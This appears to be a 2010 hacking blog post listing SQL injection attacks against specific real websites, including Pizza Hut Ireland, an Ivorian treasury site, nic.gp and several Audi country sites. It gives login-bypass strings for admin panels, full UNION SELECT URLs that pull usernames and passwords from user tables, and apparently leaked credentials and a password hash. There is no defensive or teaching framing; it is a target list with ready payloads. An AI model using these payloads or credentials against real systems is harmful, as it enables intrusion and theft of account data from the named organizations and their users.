bypass SQl

Auth ByPass;

http://www.pizzahut.ie/

http://www.pizzahutireland.com/

Panel–> Admin
Id: ‘ or ‘ 1=1
Pass: ‘ or ‘ 1=1

Sql İnjectioN;

http://www.pizzahutireland.com/locations.asp?ref=1+union+select+1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user&red-x

http://www.pizzahut.ie/locations.asp?ref=1+union+select+1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user&red-x

İd: admin
Pass: newpassword

——————————————————————–

http://www.tresor.gov.ci//admin/

id: ‘ OR ‘ ‘=’
pass: “

Yada;

http://www.tresor.gov.ci/actualites/old_file/cat.asp?c=4+union+select+0,1,2,username+from+login

http://www.tresor.gov.ci/actualites/old_file/cat.asp?c=4+union+select+0,1,2,password+from+login

——————————————————————–

http://www.nic.gp/news/newsReader.php?id=-1+

union+select+0,unhex(hex(concat_ws(0×3a,id,login,pass))),2,3%20from%20wusers

id >> user >> pass

1:pr:1d7f2cc41d686ece
——————————————————————–
http://www.audi.rs//news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.si/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ua/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ro/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users
http://ro.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users
http://w3.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0×3a,password), 4,5,6,7,8,9,10,11,12,13 from suche_users

2010/04/07 - Posted by AsosyaL | 1